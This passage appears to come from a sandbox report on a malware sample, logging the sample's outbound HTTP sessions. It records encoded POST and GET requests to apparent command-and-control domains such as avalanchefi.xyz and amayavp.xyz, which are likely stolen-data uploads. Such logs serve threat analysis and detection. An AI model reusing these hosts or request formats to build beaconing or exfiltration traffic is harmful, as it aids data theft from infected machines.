                                                                    Data Ascii: dpy4vDKP=gwPdUvIurC4xQ8krVkTqBrF4S9CtDwS6rXaGyjf79/CchIgbyOagIjoKi6L03fXSqYOzZPK7XVnjm54IvOaEuKKI5KjUGOTEeutDRUxDW/qNGRKIUj81QLGXTwrQb8da6HrKMmka0pWhsn/0DnIxQjT0NcRQIcD0UCd4FP0An/QwCnkdh+w+QKA7cFmg8DV0NVANGyKlllSZ2k3m/nLIhHeuo8lszvDg/F7PxDmnjEcAqPhkhV261Se09eEoPyAcb8JyaDNDFVobo8N+/uksDxuat1Jw+0uGHjQ8rjUy+TSrAnX2vn973ntB5f76v1N1o75Mp0VdilL4Epi8DOpcyC4aPQZ//+HuzqB3jg96bBSvmjRXSU4zRXr2jPO5wHHr8/7opipGl+Res5viFj0WAbapCvCegZAq20l34jX7TM+F4z7NqpWmoFW3xU5I+UMndefFsu8S6Rby/LZcgD5v7J5uzt+WUYkjys8WVHby1pQS+5o/xGk6aMeMeCHQCTtwmcBbIXFTh49NmQ57LeWAxagzwVToHZdHco+4+HqdZi8n6CxgUpy9SybMzRSBpg2ZXSdOyle/Ot8ygnLwFgsQl++9M10LBPCtLrYHSLrFgkSIsZ3onAqWwwZcldDwcs619DVHVixII9eUXciZHgdNTG3JGakAtpFX4Jg7sJRrajJgQV/UpS72UJ2g55zNrwl1Vkp/53AR9qPmkzw/Y+BvNBzQuua6OhDTbCp9I9BcnXh5zgxfSzNbV51S9xVU9GISc+LbO408G3ebIkC8y53PCE25qmE3Xt5g0ExV76PTiuWRw+uPS6cbypvtqEu+fBfMB6umf2Vzn2Pzy7LxV7prUD8pi/ifrgApg1ki2B+67OV6ujPMUBFZ6q5ymedsuzz1LOR+s2R+VRF5dazEnAX5aHS19Jp+AM8HYBPqj0yQ9hBb9yTbRMveDfQtJd1fHa89hQTBASGWBIzyjzpAgPMGVKMFLXiH9dZxVaHBuEccbPP [TRUNCATED]
                                                                    Dec 5, 2024 09:45:51.317899942 CET    1236                IN          HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:45:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip
                                                                    Data Ascii: c32Y[oF~"k&,\d\- X"r4-$EaM}X`j_@,.a7m3s|;K7..~v2kV0/KOW->ncqfvJi'I)2Xm:Y[nP#877'iJ-mT4j,}"6Mm^j@c+Z.G[4Q?~?z4Oh/^XK154kzN*ReBtx(4CnX/`SrE(/,vq.1*Zx<*+!^VXSF;VOC'lq<plweC\UT>Q(L+5-0fYP-t6eSzBsY5|uU/Sz4yE33JTPcQlkNrlrQ_C`@0-!_W)?geV3IG^->s7xxkSwfN@L|iVbwL{67~x=iF,X*?kaAm,p@]Pjmi~@QL=~?Su}Ss+d7]Hyc}y[p$&T/xmf+XZoguKzSJV|]/yji7>8DRU8dYV7Q[@lLD%@Pcrcz{[j:LL0)G9]Li`5<6R [TRUNCATED]
                                                                    Dec 5, 2024 09:45:51.317970037 CET    1236                IN          Data Raw: [hex dump omitted]
                                                                    Data Ascii: !UP)I!2){MyA8n4U)6YmmNz%zZ7Km'[At1frU.2[#0C^t[~ q|n"*K,({u4nVSfi3XC5=@zRE{KQBj*K+MU
                                                                    Dec 5, 2024 09:45:51.317985058 CET    844                 IN          Data Raw: [hex dump omitted]
                                                                    Data Ascii: <BR'')Ldlz"-Z5&|6N,.bqN'y-4[1Acw0NxEEKa]H<9PzL6+ZA]<,#;CyM-*TuYp15Idrh^du.}l2hJ~ ,0*HI'&&$l`sBU42


                                                                    Session ID   Source IP     Source Port   Destination IP    Destination Port   PID    Process
                                                                    36           192.168.2.8   49745         91.226.30.3       80                 5952   C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp                             Bytes transferred   Direction   Data
                                                                    Dec 5, 2024 09:45:52.658715963 CET    514                 OUT         GET /v3s3/?dpy4vDKP=tyn9Xf4Tiyk8OMwOE2/3W7I6SfC4Fy+XuF+V6x+u+aHyo7NExtCHdgYtt4f9rPCqzYPXesK+A0TEw6Z3hMmMu6en0oemB8DST7EgTGpjLeWNMzHlOHw+YKqeTj7VW+MXtw==&t8=erepa0aHg HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.vpnto.net
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:45:53.979439974 CET    1236                IN          HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:45:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Data Ascii: 1ced<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta name="keywords" content=", , , , domain, idn, whois"><meta content="text/html" charset="utf-8" http-equiv="Content-Type" /><link rel="stylesheet" href="/style.css" type="text/css" /><title>Vpnto.net</title></head><body>... Yandex.Metrika counter --><script type="text/javascript">(function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter24408988 = new Ya.Metrika({id:24408988, webvisor:true, clickmap:true, trackLinks:true, accurateTrackBounce:true, trackHash:true}); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/javascript"; s.async = true; s.src = (d.location.p [TRUNCATED]
                                                                    Timestamp: Dec 5, 2024 09:45:53.979496002 CET | Bytes transferred: 224 | Direction: IN | Data Raw: 61 2f 77 61 74 63 68 2e 6a 73 22 3b 20 69 66 20 28 77 2e 6f 70 65 72 61 20 3d 3d 20 22 5b 6f 62 6a 65 63 74 20 4f 70 65 72 61 5d 22 29 20 7b 20 64 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64
                                                                    Data Ascii: a/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks");</script><noscript><div><img src="//mc.yandex.ru/watch/244089
                                                                    Timestamp: Dec 5, 2024 09:45:53.979507923 CET | Bytes transferred: 1236 | Direction: IN | Data Raw: 38 38 22 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 6c 65 66 74 3a 2d 39 39 39 39 70 78 3b 22 20 61 6c 74 3d 22 22 20 2f 3e 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 21 2d 2d 20 2f 59 61 6e 64 65
                                                                    Data Ascii: 88" style="position:absolute; left:-9999px;" alt="" /></div></noscript>... /Yandex.Metrika counter --><div id="content"><div id="header"> <p id="top_info"><br /> <a href="https://i7.ru"><img src="/images/i7logo.png" alt="" wid
                                                                    Timestamp: Dec 5, 2024 09:45:53.979556084 CET | Bytes transferred: 1236 | Direction: IN | Data Raw: 09 3c 2f 64 69 76 3e 2d 2d 3e 0a 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 65 66 74 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 65 66 74 5f 61 72 74 69 63 6c 65 73 22 3e 0a 09 09 09 20 20 3c 68 32 3e 26 6e 62 73 70 3b 3c 2f 68
                                                                    Data Ascii: </div>--><div class="left"><div class="left_articles"> <h2>&nbsp;</h2><a href="http://www.i7.ru/"><img src="/images/logobig.png" alt="i7.RU" width="130" height="146" class="thumbnail" style="border:none; margin-top:6px"/></a
                                                                    Timestamp: Dec 5, 2024 09:45:53.979598045 CET | Bytes transferred: 1236 | Direction: IN | Data Raw: b2 d1 8b 20 d1 83 d0 b6 d0 b5 20 d1 81 d0 b4 d0 b5 d0 bb d0 b0 d0 bb d0 b8 2c 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 b2 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 bd d0 be d0 b5 20 d0 b8 d0 bc d1 8f 2e
                                                                    Data Ascii: , . .</p></div></div><div class="thirds"><
                                                                    Timestamp: Dec 5, 2024 09:45:53.979618073 CET | Bytes transferred: 1236 | Direction: IN | Data Raw: 20 61 63 74 69 6f 6e 3d 27 68 74 74 70 73 3a 2f 2f 77 68 6f 69 73 37 2e 72 75 27 20 6e 61 6d 65 3d 27 7a 6f 6e 65 66 6f 72 6d 27 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20
                                                                    Data Ascii: action='https://whois7.ru' name='zoneform' style="text-align:center"> <div class='f'> <input name="q" type="text" style="width:165px; font-size:14px; padding:3px; color: #A72119; font-weight: bold;" value="vpnto.ne
                                                                    Timestamp: Dec 5, 2024 09:45:53.979630947 CET | Bytes transferred: 1172 | Direction: IN | Data Raw: d0 b5 d0 bd d0 bd d1 8b d1 85 20 d0 b8 d0 bc d0 b5 d0 bd 20 d0 b2 20 d0 b7 d0 be d0 bd d0 b5 20 2e 52 55 2c 20 d1 81 d0 b3 d1 80 d1 83 d0 bf d0 bf d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd d0 bd d1 8b d1 85 20 d0 bf d0 be 20 d0 b4 d0 b0 d1 82 d0 b5 20
                                                                    Data Ascii: .RU, .


                                                                    Session ID: 37 | Source IP: 192.168.2.8 | Source Port: 49746 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 5952 | Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp: Dec 5, 2024 09:45:59.626393080 CET | Bytes transferred: 786 | Direction: OUT | Data: POST /vxa5/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.avalanchefi.xyz
                                                                    Origin: http://www.avalanchefi.xyz
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.avalanchefi.xyz/vxa5/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 36 6b 56 68 50 36 32 42 35 73 4d 68 2f 74 4a 41 68 76 33 70 63 73 68 32 42 49 4f 65 64 57 79 71 58 51 4c 78 75 59 36 58 57 54 64 4c 46 6d 55 6c 56 49 57 65 4f 75 41 4f 47 62 77 77 77 30 71 31 6e 73 63 4f 78 61 2f 67 74 2f 34 6f 78 6e 68 6e 4d 33 52 30 73 77 46 65 45 49 56 56 61 38 6d 58 6c 34 55 36 31 68 6e 52 6f 61 48 62 6b 44 70 65 49 65 64 6d 45 6b 7a 63 71 70 48 66 58 44 2f 32 57 72 4b 71 59 78 41 56 41 6f 7a 66 2b 6b 72 6a 73 73 62 6e 51 67 39 39 49 56 43 4e 55 44 72 43 6d 31 57 34 42 2f 39 37 58 55 4f 7a 6e 69 65 66 78 46 4c 67 39 4f 71 49 50 77 43 6a 31 75 44 6a 51 78 44 4f 43 49 4d 3d
                                                                    Data Ascii: dpy4vDKP=6kVhP62B5sMh/tJAhv3pcsh2BIOedWyqXQLxuY6XWTdLFmUlVIWeOuAOGbwww0q1nscOxa/gt/4oxnhnM3R0swFeEIVVa8mXl4U61hnRoaHbkDpeIedmEkzcqpHfXD/2WrKqYxAVAozf+krjssbnQg99IVCNUDrCm1W4B/97XUOzniefxFLg9OqIPwCj1uDjQxDOCIM=


                                                                    Session ID: 38 | Source IP: 192.168.2.8 | Source Port: 49747 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 5952 | Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp: Dec 5, 2024 09:46:02.295723915 CET | Bytes transferred: 806 | Direction: OUT | Data: POST /vxa5/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.avalanchefi.xyz
                                                                    Origin: http://www.avalanchefi.xyz
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.avalanchefi.xyz/vxa5/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 36 6b 56 68 50 36 32 42 35 73 4d 68 35 4d 35 41 6a 49 44 70 61 4d 68 78 66 34 4f 65 53 32 79 75 58 51 58 78 75 61 58 53 52 67 35 4c 46 46 41 6c 62 70 57 65 50 75 41 4f 4a 37 77 50 75 45 71 79 6e 73 5a 7a 78 62 54 67 74 37 51 6f 78 6e 52 6e 4d 47 52 7a 73 67 46 63 4c 6f 56 4c 5a 4d 6d 58 6c 34 55 36 31 68 7a 33 6f 61 66 62 6b 7a 5a 65 4b 2f 64 6c 46 6b 7a 62 36 35 48 66 42 44 2f 49 57 72 4c 4a 59 30 67 76 41 71 37 66 2b 6d 7a 6a 76 2b 6a 6d 5a 67 39 33 47 31 44 6f 56 57 32 7a 72 45 47 6c 44 5a 77 41 51 45 57 63 6d 55 76 31 72 6e 44 6d 2b 4f 43 6a 50 7a 71 56 77 5a 65 4c 4b 53 54 2b 63 66 61 5a 44 44 36 66 77 38 46 6a 34 2f 71 38 70 4e 67 42 79 35 55 47
                                                                    Data Ascii: dpy4vDKP=6kVhP62B5sMh5M5AjIDpaMhxf4OeS2yuXQXxuaXSRg5LFFAlbpWePuAOJ7wPuEqynsZzxbTgt7QoxnRnMGRzsgFcLoVLZMmXl4U61hz3oafbkzZeK/dlFkzb65HfBD/IWrLJY0gvAq7f+mzjv+jmZg93G1DoVW2zrEGlDZwAQEWcmUv1rnDm+OCjPzqVwZeLKST+cfaZDD6fw8Fj4/q8pNgBy5UG


                                                                    Session ID: 39 | Source IP: 192.168.2.8 | Source Port: 49748 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 5952 | Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp: Dec 5, 2024 09:46:04.960588932 CET | Bytes transferred: 1823 | Direction: OUT | Data: POST /vxa5/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.avalanchefi.xyz
                                                                    Origin: http://www.avalanchefi.xyz
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.avalanchefi.xyz/vxa5/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 36 6b 56 68 50 36 32 42 35 73 4d 68 35 4d 35 41 6a 49 44 70 61 4d 68 78 66 34 4f 65 53 32 79 75 58 51 58 78 75 61 58 53 52 67 78 4c 47 31 63 6c 55 75 43 65 4d 75 41 4f 58 72 77 4b 75 45 72 75 6e 6f 4e 33 78 61 76 77 74 39 55 6f 77 45 5a 6e 4b 79 6c 7a 6e 67 46 63 54 59 56 4b 61 38 6d 34 6c 37 73 2b 31 68 6a 33 6f 61 66 62 6b 31 39 65 4f 75 64 6c 49 45 7a 63 71 70 48 54 58 44 2f 7a 57 71 69 79 59 30 74 59 41 36 62 66 39 47 6a 6a 70 4e 62 6d 46 77 39 35 42 31 44 4b 56 57 79 6f 72 45 62 63 44 5a 74 49 51 47 57 63 6e 52 53 6f 77 57 44 45 69 66 4b 4f 4a 78 47 44 72 35 71 53 44 79 44 61 65 6f 2b 46 50 47 4b 4b 77 39 4a 4c 30 38 4c 47 2b 72 51 30 37 66 64 49 35 75 34 4b 37 74 30 62 61 57 48 31 66 49 64 42 4a 77 67 30 47 76 6d 69 77 4f 45 51 45 30 39 47 64 52 41 64 67 41 4d 6c 77 4b 32 62 36 70 64 61 72 7a 34 4b 4a 4a 6c 4f 67 46 6f 67 76 46 69 31 75 37 32 4c 49 66 71 78 75 6f 73 49 72 6a 73 61 69 70 63 71 6f 51 41 4a 2b 48 49 49 4c 33 63 35 39 49 77 2f 79 42 5a 66 43 79 36 33 64 [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP=[TRUNCATED]


                                                                    Session ID: 40 | Source IP: 192.168.2.8 | Source Port: 49749 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 5952 | Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp: Dec 5, 2024 09:46:07.626533985 CET | Bytes transferred: 520 | Direction: OUT | Data: GET /vxa5/?t8=erepa0aHg&dpy4vDKP=3m9BMPCo28gPx+sVgKXwS8IlJOXqcXmGTC3iha7DeRIyHWQ2U5yIEoIaKrBYwlKWmJAMybrbkv8ugG4OPEpxsFgkF6ZwXtqNiPQ58hDKvZiQtRpFO+ljJVXyg6SqNh6RKQ== HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.avalanchefi.xyz
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Timestamp: Dec 5, 2024 09:46:08.717693090 CET | Bytes transferred: 409 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                    Server: openresty
                                                                    Date: Thu, 05 Dec 2024 08:46:08 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 269
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 74 38 3d 65 72 65 70 61 30 61 48 67 26 64 70 79 34 76 44 4b 50 3d 33 6d 39 42 4d 50 43 6f 32 38 67 50 78 2b 73 56 67 4b 58 77 53 38 49 6c 4a 4f 58 71 63 58 6d 47 54 43 33 69 68 61 37 44 65 52 49 79 48 57 51 32 55 35 79 49 45 6f 49 61 4b 72 42 59 77 6c 4b 57 6d 4a 41 4d 79 62 72 62 6b 76 38 75 67 47 34 4f 50 45 70 78 73 46 67 6b 46 36 5a 77 58 74 71 4e 69 50 51 35 38 68 44 4b 76 5a 69 51 74 52 70 46 4f 2b 6c 6a 4a 56 58 79 67 36 53 71 4e 68 36 52 4b 51 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?t8=erepa0aHg&dpy4vDKP=3m9BMPCo28gPx+sVgKXwS8IlJOXqcXmGTC3iha7DeRIyHWQ2U5yIEoIaKrBYwlKWmJAMybrbkv8ugG4OPEpxsFgkF6ZwXtqNiPQ58hDKvZiQtRpFO+ljJVXyg6SqNh6RKQ=="}</script></head></html>


                                                                    Session ID: 41 | Source IP: 192.168.2.8 | Source Port: 49750 | Destination IP: 185.27.134.144 | Destination Port: 80 | PID: 5952 | Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp: Dec 5, 2024 09:46:14.634778023 CET | Bytes transferred: 774 | Direction: OUT | Data: POST /pxvi/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.amayavp.xyz
                                                                    Origin: http://www.amayavp.xyz
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.amayavp.xyz/pxvi/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 2f 4a 5a 61 4c 69 30 45 61 52 4b 41 7a 46 4f 6d 78 43 50 47 39 72 63 41 39 35 66 42 43 64 37 48 75 4f 67 2b 4c 32 41 4c 78 77 6f 72 77 6d 41 7a 52 61 4e 46 2b 71 39 41 74 51 4b 4b 34 62 46 4a 35 6a 74 79 77 33 5a 51 52 34 78 32 43 4a 63 50 54 62 57 30 6c 37 7a 4e 78 72 6c 51 4d 53 39 33 74 57 6b 31 65 32 77 39 4d 41 6d 6e 6e 6f 75 56 62 61 2b 51 44 50 6b 5a 68 43 58 36 56 62 4f 50 45 76 79 39 4e 7a 49 55 38 49 55 6d 71 70 39 4f 2b 6d 75 6c 69 30 57 51 47 74 50 48 5a 4f 74 47 64 67 67 4f 46 32 4c 72 78 43 73 37 75 53 37 49 39 37 42 4a 74 75 7a 48 44 76 57 6e 6b 32 43 56 2b 50 2f 6e 74 72 63 3d
                                                                    Data Ascii: dpy4vDKP=/JZaLi0EaRKAzFOmxCPG9rcA95fBCd7HuOg+L2ALxworwmAzRaNF+q9AtQKK4bFJ5jtyw3ZQR4x2CJcPTbW0l7zNxrlQMS93tWk1e2w9MAmnnouVba+QDPkZhCX6VbOPEvy9NzIU8IUmqp9O+muli0WQGtPHZOtGdggOF2LrxCs7uS7I97BJtuzHDvWnk2CV+P/ntrc=
                                                                    Timestamp: Dec 5, 2024 09:46:15.690886021 CET | Bytes transferred: 685 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:46:15 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                    Cache-Control: no-cache
                                                                    Content-Encoding: br
                                                                    Data Raw: 31 62 62 0d 0a a1 f0 19 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 53 d0 08 13 4d f5 dc 0f 5e 76 f9 62 c0 09 3f ff db cc 06 36 d0 d9 5c b3 67 7f 82 d4 83 63 6e 8d 40 bb 24 b0 4d a7 87 46 8d 00 79 52 d3 9e 61 36 92 76 11 f6 17 18 35 ad e8 c6 4d 85 66 2e 75 39 c1 c8 5d 78 06 e0 8c 85 cf ef da f8 21 17 79 61 48 a2 0e 35 82 55 59 eb 0e 02 96 ac a1 09 27 e4 1f e2 a1 fd 9f 22 f5 64 b7 1e 39 c0 b5 61 e0 f3 9b 1a 48 00 76 8d a5 75 e3 fc 5c 0a 47 7f e5 ef e9 5f 4c e6 00 d7 f3 b9 dc 5d ea 08 95 60 99 5a c0 98 3a 88 6b d7 32 ef db 5f 3b df 27 d6 07 2f e1 8d f9 74 df 97 38 c6 15 c6 c4 bf f8 90 40 23 2f e1 cb ae 7a 43 26 ff eb 1d 48 00 e8 3f b0 e3 8c 29 29 4c 2c 64 92 a4 26 17 bc d4 3c 63 85 30 8a 89 58 e5 98 50 65 f3 b6 28 b3 3c d7 a9 b5 b6 e4 3a 13 22 2f 45 cc 44 ca 4a a6 72 e1 ca 78 40 34 c0 b2 97 0a cd 13 c3 5d e1 0a 99 49 6d 12 a6 cb 3c 8f b5 28 f2 4c 8f a4 36 13 bd 6d ec 04 30 07 f8 f7 77 69 17 4b c0 3e d2 30 c1 ae 5f df 7f 84 c6 ea f9 6e ba f4 34 4d a9 a4 8a 10 1f d7 28 32 3f [TRUNCATED]
                                                                    Data Ascii: 1bb #MhEJ^3pSM^vb?6\gcn@$MFyRa6v5Mf.u9]x!yaH5UY'"d9aHvu\G_L]`Z:k2_;'/t8@#/zC&H?))L,d&<c0XPe(<:"/EDJrx@4]Im<(L6m0wiK>0_n4M(2?vwEQwVYbb=k}4tE=H0K.HG-D)<*Ef*Zjo1ZdVAarU0T*gV&"0


                                                                    Session ID: 42 | Source IP: 192.168.2.8 | Source Port: 49751 | Destination IP: 185.27.134.144 | Destination Port: 80 | PID: 5952 | Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp: Dec 5, 2024 09:46:17.300817013 CET | Bytes transferred: 794 | Direction: OUT | Data: POST /pxvi/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.amayavp.xyz
                                                                    Origin: http://www.amayavp.xyz
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.amayavp.xyz/pxvi/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 2f 4a 5a 61 4c 69 30 45 61 52 4b 41 69 56 2b 6d 7a 68 58 47 73 62 63 42 34 35 66 42 4a 39 37 44 75 4f 73 2b 4c 7a 6b 6c 78 47 51 72 78 43 51 7a 51 62 4e 46 72 71 39 41 69 77 4c 43 6c 72 46 38 35 6a 67 4e 77 32 31 51 52 34 56 32 43 49 73 50 54 49 75 37 33 62 7a 4c 34 4c 6c 53 52 69 39 33 74 57 6b 31 65 32 6c 31 4d 42 4f 6e 6e 38 71 56 61 34 57 52 46 2f 6b 59 33 79 58 36 47 4c 4f 4c 45 76 7a 53 4e 32 30 36 38 4b 63 6d 71 70 4e 4f 2f 33 75 6d 31 6b 57 53 4a 4e 4f 77 50 4d 30 33 64 67 55 52 4d 30 61 50 36 44 59 2b 76 6b 4b 69 6e 5a 4a 50 75 75 62 73 44 73 2b 52 68 42 66 39 6b 73 76 58 7a 38 4b 4e 50 75 33 36 55 59 31 4c 78 2f 38 32 6c 45 36 36 77 39 45 64
                                                                    Data Ascii: dpy4vDKP=/JZaLi0EaRKAiV+mzhXGsbcB45fBJ97DuOs+LzklxGQrxCQzQbNFrq9AiwLClrF85jgNw21QR4V2CIsPTIu73bzL4LlSRi93tWk1e2l1MBOnn8qVa4WRF/kY3yX6GLOLEvzSN2068KcmqpNO/3um1kWSJNOwPM03dgURM0aP6DY+vkKinZJPuubsDs+RhBf9ksvXz8KNPu36UY1Lx/82lE66w9Ed
                                                                    Timestamp: Dec 5, 2024 09:46:18.538708925 CET | Bytes transferred: 685 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:46:18 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                    Cache-Control: no-cache
                                                                    Content-Encoding: br
